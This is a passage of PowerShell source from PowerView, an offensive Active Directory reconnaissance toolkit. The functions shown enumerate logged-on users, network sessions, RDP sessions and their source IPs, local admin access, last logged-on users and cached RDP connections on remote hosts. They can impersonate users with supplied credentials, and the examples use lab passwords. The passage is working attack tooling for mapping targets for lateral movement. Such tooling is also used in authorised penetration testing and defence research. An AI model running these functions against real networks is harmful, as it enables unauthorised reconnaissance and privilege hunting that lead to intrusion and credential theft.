Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-NetLoggedon {
<#
.SYNOPSIS
Returns users logged on the local (or a remote) machine.
Note: administrative rights needed for newer Windows OSes.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
.DESCRIPTION
This function will execute the NetWkstaUserEnum Win32API call to query
a given host for actively logged on users.
.PARAMETER ComputerName
Specifies the hostname to query for logged on users (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system using Invoke-UserImpersonation.
.EXAMPLE
Get-NetLoggedon
Returns users actively logged onto the local host.
.EXAMPLE
Get-NetLoggedon -ComputerName sqlserver
Returns users actively logged onto the 'sqlserver' host.
.EXAMPLE
Get-DomainComputer | Get-NetLoggedon
Returns all logged on users for all computers in the domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
.OUTPUTS
PowerView.LoggedOnUserInfo
A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.
.LINK
http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
#>
[OutputType('PowerView.LoggedOnUserInfo')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
# declare the reference variables
$QueryLevel = 1
$PtrInfo = [IntPtr]::Zero
$EntriesRead = 0
$TotalRead = 0
$ResumeHandle = 0
# get logged on user information
$Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
# locate the offset of the initial intPtr
$Offset = $PtrInfo.ToInt64()
# 0 = success
if (($Result -eq 0) -and ($Offset -gt 0)) {
# work out how much to increment the pointer by finding out the size of the structure
$Increment = $WKSTA_USER_INFO_1::GetSize()
# parse all the result structures
for ($i = 0; ($i -lt $EntriesRead); $i++) {
# create a new int ptr at the given offset and cast the pointer as our result structure
$NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
$Info = $NewIntPtr -as $WKSTA_USER_INFO_1
# return all the sections of the structure - have to do it this way for V2
$LoggedOn = $Info | Select-Object *
$LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
$LoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LoggedOnUserInfo')
$Offset = $NewIntPtr.ToInt64()
$Offset += $Increment
$LoggedOn
}
# free up the result buffer
$Null = $Netapi32::NetApiBufferFree($PtrInfo)
}
else {
Write-Verbose "[Get-NetLoggedon] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-NetSession {
<#
.SYNOPSIS
Returns session information for the local (or a remote) machine.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
.DESCRIPTION
This function will execute the NetSessionEnum Win32API call to query
a given host for active sessions.
.PARAMETER ComputerName
Specifies the hostname to query for sessions (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system using Invoke-UserImpersonation.
.EXAMPLE
Get-NetSession
Returns active sessions on the local host.
.EXAMPLE
Get-NetSession -ComputerName sqlserver
Returns active sessions on the 'sqlserver' host.
.EXAMPLE
Get-DomainController | Get-NetSession
Returns active sessions on all domain controllers.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-NetSession -ComputerName sqlserver -Credential $Cred
.OUTPUTS
PowerView.SessionInfo
A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
the CName/UserName/Time/IdleTime for each session, with the ComputerName added.
.LINK
http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
#>
[OutputType('PowerView.SessionInfo')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
# arguments for NetSessionEnum
$QueryLevel = 10
$PtrInfo = [IntPtr]::Zero
$EntriesRead = 0
$TotalRead = 0
$ResumeHandle = 0
# get session information
$Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
# locate the offset of the initial intPtr
$Offset = $PtrInfo.ToInt64()
# 0 = success
if (($Result -eq 0) -and ($Offset -gt 0)) {
# work out how much to increment the pointer by finding out the size of the structure
$Increment = $SESSION_INFO_10::GetSize()
# parse all the result structures
for ($i = 0; ($i -lt $EntriesRead); $i++) {
# create a new int ptr at the given offset and cast the pointer as our result structure
$NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
$Info = $NewIntPtr -as $SESSION_INFO_10
# return all the sections of the structure - have to do it this way for V2
$Session = $Info | Select-Object *
$Session | Add-Member Noteproperty 'ComputerName' $Computer
$Session.PSObject.TypeNames.Insert(0, 'PowerView.SessionInfo')
$Offset = $NewIntPtr.ToInt64()
$Offset += $Increment
$Session
}
# free up the result buffer
$Null = $Netapi32::NetApiBufferFree($PtrInfo)
}
else {
Write-Verbose "[Get-NetSession] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-RegLoggedOn {
<#
.SYNOPSIS
Returns who is logged onto the local (or a remote) machine
through enumeration of remote registry keys.
Note: This function requires only domain user rights on the
machine you're enumerating, but remote registry must be enabled.
Author: Matt Kelly (@BreakersAll)
License: BSD 3-Clause
Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID
.DESCRIPTION
This function will query the HKU registry values to retrieve the local
logged on users SID and then attempt and reverse it.
Adapted technique from Sysinternal's PSLoggedOn script. Benefit over
using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
required (NetWkstaUserEnum requires remote admin access).
.PARAMETER ComputerName
Specifies the hostname to query for remote registry values (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system using Invoke-UserImpersonation.
.EXAMPLE
Get-RegLoggedOn
Returns users actively logged onto the local host.
.EXAMPLE
Get-RegLoggedOn -ComputerName sqlserver
Returns users actively logged onto the 'sqlserver' host.
.EXAMPLE
Get-DomainController | Get-RegLoggedOn
Returns users actively logged on all domain controllers.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred
.OUTPUTS
PowerView.RegLoggedOnUser
A PSCustomObject including the UserDomain/UserName/UserSID of each
actively logged on user, with the ComputerName added.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.RegLoggedOnUser')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost'
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
try {
# retrieve HKU remote registry values
$Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName")
# sort out bogus sid's like _class
$Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object {
$UserName = ConvertFrom-SID -ObjectSID $_ -OutputType 'DomainSimple'
if ($UserName) {
$UserName, $UserDomain = $UserName.Split('@')
}
else {
$UserName = $_
$UserDomain = $Null
}
$RegLoggedOnUser = New-Object PSObject
$RegLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName"
$RegLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain
$RegLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName
$RegLoggedOnUser | Add-Member Noteproperty 'UserSID' $_
$RegLoggedOnUser.PSObject.TypeNames.Insert(0, 'PowerView.RegLoggedOnUser')
$RegLoggedOnUser
}
}
catch {
Write-Verbose "[Get-RegLoggedOn] Error opening remote registry on '$ComputerName' : $_"
}
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-NetRDPSession {
<#
.SYNOPSIS
Returns remote desktop/session information for the local (or a remote) machine.
Note: only members of the Administrators or Account Operators local group
can successfully execute this functionality on a remote target.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
.DESCRIPTION
This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation
Win32API calls to query a given RDP remote service for active sessions and originating
IPs. This is a replacement for qwinsta.
.PARAMETER ComputerName
Specifies the hostname to query for active sessions (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system using Invoke-UserImpersonation.
.EXAMPLE
Get-NetRDPSession
Returns active RDP/terminal sessions on the local host.
.EXAMPLE
Get-NetRDPSession -ComputerName "sqlserver"
Returns active RDP/terminal sessions on the 'sqlserver' host.
.EXAMPLE
Get-DomainController | Get-NetRDPSession
Returns active RDP/terminal sessions on all domain controllers.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-NetRDPSession -ComputerName sqlserver -Credential $Cred
.OUTPUTS
PowerView.RDPSessionInfo
A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,
with the ComputerName added.
.LINK
https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx
#>
[OutputType('PowerView.RDPSessionInfo')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
# open up a handle to the Remote Desktop Session host
$Handle = $Wtsapi32::WTSOpenServerEx($Computer)
# if we get a non-zero handle back, everything was successful
if ($Handle -ne 0) {
# arguments for WTSEnumerateSessionsEx
$ppSessionInfo = [IntPtr]::Zero
$pCount = 0
# get information on all current sessions
$Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
# locate the offset of the initial intPtr
$Offset = $ppSessionInfo.ToInt64()
if (($Result -ne 0) -and ($Offset -gt 0)) {
# work out how much to increment the pointer by finding out the size of the structure
$Increment = $WTS_SESSION_INFO_1::GetSize()
# parse all the result structures
for ($i = 0; ($i -lt $pCount); $i++) {
# create a new int ptr at the given offset and cast the pointer as our result structure
$NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
$Info = $NewIntPtr -as $WTS_SESSION_INFO_1
$RDPSession = New-Object PSObject
if ($Info.pHostName) {
$RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName
}
else {
# if no hostname returned, use the specified hostname
$RDPSession | Add-Member Noteproperty 'ComputerName' $Computer
}
$RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName
if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) {
# if a domain isn't returned just use the username
$RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)"
}
else {
$RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)"
}
$RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID
$RDPSession | Add-Member Noteproperty 'State' $Info.State
$ppBuffer = [IntPtr]::Zero
$pBytesReturned = 0
# query for the source client IP with WTSQuerySessionInformation
# https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx
$Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ($Result2 -eq 0) {
Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError2).Message)"
}
else {
$Offset2 = $ppBuffer.ToInt64()
$NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2
$Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS
$SourceIP = $Info2.Address
if ($SourceIP[2] -ne 0) {
$SourceIP = [String]$SourceIP[2]+'.'+[String]$SourceIP[3]+'.'+[String]$SourceIP[4]+'.'+[String]$SourceIP[5]
}
else {
$SourceIP = $Null
}
$RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP
$RDPSession.PSObject.TypeNames.Insert(0, 'PowerView.RDPSessionInfo')
$RDPSession
# free up the memory buffer
$Null = $Wtsapi32::WTSFreeMemory($ppBuffer)
$Offset += $Increment
}
}
# free up the memory result buffer
$Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount)
}
else {
Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
# close off the service handle
$Null = $Wtsapi32::WTSCloseServer($Handle)
}
else {
Write-Verbose "[Get-NetRDPSession] Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName"
}
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Test-AdminAccess {
<#
.SYNOPSIS
Tests if the current user has administrative access to the local (or a remote) machine.
Idea stolen from the local_admin_search_enum post module in Metasploit written by:
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
.DESCRIPTION
This function will use the OpenSCManagerW Win32API call to establish
a handle to the remote host. If this succeeds, the current user context
has local administrator acess to the target.
.PARAMETER ComputerName
Specifies the hostname to check for local admin access (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system using Invoke-UserImpersonation.
.EXAMPLE
Test-AdminAccess -ComputerName sqlserver
Returns results indicating whether the current user has admin access to the 'sqlserver' host.
.EXAMPLE
Get-DomainComputer | Test-AdminAccess
Returns what machines in the domain the current user has access to.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Test-AdminAccess -ComputerName sqlserver -Credential $Cred
.OUTPUTS
PowerView.AdminAccess
A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether
the current user has local admin rights, along with the ComputerName added.
.LINK
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
#>
[OutputType('PowerView.AdminAccess')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
$Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
$IsAdmin = New-Object PSObject
$IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer
# if we get a non-zero handle back, everything was successful
if ($Handle -ne 0) {
$Null = $Advapi32::CloseServiceHandle($Handle)
$IsAdmin | Add-Member Noteproperty 'IsAdmin' $True
}
else {
Write-Verbose "[Test-AdminAccess] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
$IsAdmin | Add-Member Noteproperty 'IsAdmin' $False
}
$IsAdmin.PSObject.TypeNames.Insert(0, 'PowerView.AdminAccess')
$IsAdmin
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-NetComputerSiteName {
<#
.SYNOPSIS
Returns the AD site where the local (or a remote) machine resides.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
.DESCRIPTION
This function will use the DsGetSiteName Win32API call to look up the
name of the site where a specified computer resides.
.PARAMETER ComputerName
Specifies the hostname to check the site for (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system using Invoke-UserImpersonation.
.EXAMPLE
Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
Returns the site for WINDOWS1.testlab.local.
.EXAMPLE
Get-DomainComputer | Get-NetComputerSiteName
Returns the sites for every machine in AD.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
.OUTPUTS
PowerView.ComputerSite
A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.
#>
[OutputType('PowerView.ComputerSite')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
if ($PSBoundParameters['Credential']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
}
PROCESS {
ForEach ($Computer in $ComputerName) {
# if we get an IP address, try to resolve the IP to a hostname
if ($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') {
$IPAddress = $Computer
$Computer = [System.Net.Dns]::GetHostByAddress($Computer) | Select-Object -ExpandProperty HostName
}
else {
$IPAddress = @(Resolve-IPAddress -ComputerName $Computer)[0].IPAddress
}
$PtrInfo = [IntPtr]::Zero
$Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo)
$ComputerSite = New-Object PSObject
$ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer
$ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress
if ($Result -eq 0) {
$Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo)
$ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename
}
else {
Write-Verbose "[Get-NetComputerSiteName] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
$ComputerSite | Add-Member Noteproperty 'SiteName' ''
}
$ComputerSite.PSObject.TypeNames.Insert(0, 'PowerView.ComputerSite')
# free up the result buffer
$Null = $Netapi32::NetApiBufferFree($PtrInfo)
$ComputerSite
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
function Get-WMIRegProxy {
<#
.SYNOPSIS
Enumerates the proxy server and WPAD conents for the current user.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Enumerates the proxy server and WPAD specification for the current user
on the local machine (default), or a machine specified with -ComputerName.
It does this by enumerating settings from
HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
.PARAMETER ComputerName
Specifies the system to enumerate proxy settings on. Defaults to the local host.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connecting to the remote system.
.EXAMPLE
Get-WMIRegProxy
ComputerName ProxyServer AutoConfigURL Wpad
------------ ----------- ------------- ----
WINDOWS1 http://primary.test...
.EXAMPLE
$Cred = Get-Credential "TESTLAB\administrator"
Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
ComputerName ProxyServer AutoConfigURL Wpad
------------ ----------- ------------- ----
windows1.testlab.local primary.testlab.local
.INPUTS
String
Accepts one or more computer name specification strings on the pipeline (netbios or FQDN).
.OUTPUTS
PowerView.ProxySettings
Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.
#>
[OutputType('PowerView.ProxySettings')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = $Env:COMPUTERNAME,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
ForEach ($Computer in $ComputerName) {
try {
$WmiArguments = @{
'List' = $True
'Class' = 'StdRegProv'
'Namespace' = 'root\default'
'Computername' = $Computer
'ErrorAction' = 'Stop'
}
if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
$RegProvider = Get-WmiObject @WmiArguments
$Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings'
# HKEY_CURRENT_USER
$HKCU = 2147483649
$ProxyServer = $RegProvider.GetStringValue($HKCU, $Key, 'ProxyServer').sValue
$AutoConfigURL = $RegProvider.GetStringValue($HKCU, $Key, 'AutoConfigURL').sValue
$Wpad = ''
if ($AutoConfigURL -and ($AutoConfigURL -ne '')) {
try {
$Wpad = (New-Object Net.WebClient).DownloadString($AutoConfigURL)
}
catch {
Write-Warning "[Get-WMIRegProxy] Error connecting to AutoConfigURL : $AutoConfigURL"
}
}
if ($ProxyServer -or $AutoConfigUrl) {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ComputerName' $Computer
$Out | Add-Member Noteproperty 'ProxyServer' $ProxyServer
$Out | Add-Member Noteproperty 'AutoConfigURL' $AutoConfigURL
$Out | Add-Member Noteproperty 'Wpad' $Wpad
$Out.PSObject.TypeNames.Insert(0, 'PowerView.ProxySettings')
$Out
}
else {
Write-Warning "[Get-WMIRegProxy] No proxy settings found for $ComputerName"
}
}
catch {
Write-Warning "[Get-WMIRegProxy] Error enumerating proxy settings for $ComputerName : $_"
}
}
}
}
function Get-WMIRegLastLoggedOn {
<#
.SYNOPSIS
Returns the last user who logged onto the local (or a remote) machine.
Note: This function requires administrative rights on the machine you're enumerating.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
This function uses remote registry to enumerate the LastLoggedOnUser registry key
for the local (or remote) machine.
.PARAMETER ComputerName
Specifies the hostname to query for remote registry values (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connecting to the remote system.
.EXAMPLE
Get-WMIRegLastLoggedOn
Returns the last user logged onto the local machine.
.EXAMPLE
Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
Returns the last user logged onto WINDOWS1
.EXAMPLE
Get-DomainComputer | Get-WMIRegLastLoggedOn
Returns the last user logged onto all machines in the domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred
.OUTPUTS
PowerView.LastLoggedOnUser
A PSCustomObject containing the ComputerName and last loggedon user.
#>
[OutputType('PowerView.LastLoggedOnUser')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
ForEach ($Computer in $ComputerName) {
# HKEY_LOCAL_MACHINE
$HKLM = 2147483650
$WmiArguments = @{
'List' = $True
'Class' = 'StdRegProv'
'Namespace' = 'root\default'
'Computername' = $Computer
'ErrorAction' = 'SilentlyContinue'
}
if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
# try to open up the remote registry key to grab the last logged on user
try {
$Reg = Get-WmiObject @WmiArguments
$Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI'
$Value = 'LastLoggedOnUser'
$LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue
$LastLoggedOn = New-Object PSObject
$LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
$LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser
$LastLoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LastLoggedOnUser')
$LastLoggedOn
}
catch {
Write-Warning "[Get-WMIRegLastLoggedOn] Error opening remote registry on $Computer. Remote registry likely not enabled."
}
}
}
}
function Get-WMIRegCachedRDPConnection {
<#
.SYNOPSIS
Returns information about RDP connections outgoing from the local (or remote) machine.
Note: This function requires administrative rights on the machine you're enumerating.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: ConvertFrom-SID
.DESCRIPTION
Uses remote registry functionality to query all entries for the
"Windows Remote Desktop Connection Client" on a machine, separated by
user and target server.
.PARAMETER ComputerName
Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connecting to the remote system.
.EXAMPLE
Get-WMIRegCachedRDPConnection
Returns the RDP connection client information for the local machine.
.EXAMPLE
Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local
Returns the RDP connection client information for the WINDOWS2.testlab.local machine
.EXAMPLE
Get-DomainComputer | Get-WMIRegCachedRDPConnection
Returns cached RDP information for all machines in the domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
.OUTPUTS
PowerView.CachedRDPConnection
A PSCustomObject containing the ComputerName and cached RDP information.
#>
[OutputType('PowerView.CachedRDPConnection')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
ForEach ($Computer in $ComputerName) {
# HKEY_USERS
$HKU = 2147483651
$WmiArguments = @{
'List' = $True
'Class' = 'StdRegProv'
'Namespace' = 'root\default'
'Computername' = $Computer
'ErrorAction' = 'Stop'
}
if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
try {
$Reg = Get-WmiObject @WmiArguments
# extract out the SIDs of domain users in this hive
$UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
ForEach ($UserSID in $UserSIDs) {
try {
if ($PSBoundParameters['Credential']) {
$UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential
}
else {
$UserName = ConvertFrom-SID -ObjectSid $UserSID
}
# pull out all the cached RDP connections
